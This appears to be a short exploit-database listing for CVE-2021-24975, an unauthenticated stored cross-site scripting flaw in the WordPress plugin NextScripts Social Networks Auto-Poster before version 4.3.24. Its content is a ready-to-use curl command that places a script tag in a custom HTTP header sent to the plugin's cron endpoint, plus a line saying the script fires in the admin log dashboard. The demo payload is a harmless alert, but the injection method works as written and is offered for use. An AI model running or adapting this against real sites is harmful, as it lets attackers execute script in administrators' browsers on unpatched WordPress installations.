Exploit for NextScripts: Social Networks Auto-Poster < 4.3.24 - Unauthenticated Stored XSS CVE-2021-24975

Name: Exploit for NextScripts: Social Networks Auto-Poster < 4.3.24 - Unauthenticated Stored XSS CVE-2021-24975
Rating: 5 (230 reviews)

2022-01-03 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:B99DAE3D-8230-4427-ADC5-4EF9CBFB8BA1
curl -H 'x-tomato: <script>alert(/XSS/);</script>' 'https://example.com/?nxs-cronrun=yes'

The XSS will be triggered in the Log/History dashboard (/wp-admin/admin.php?page=nxs-log)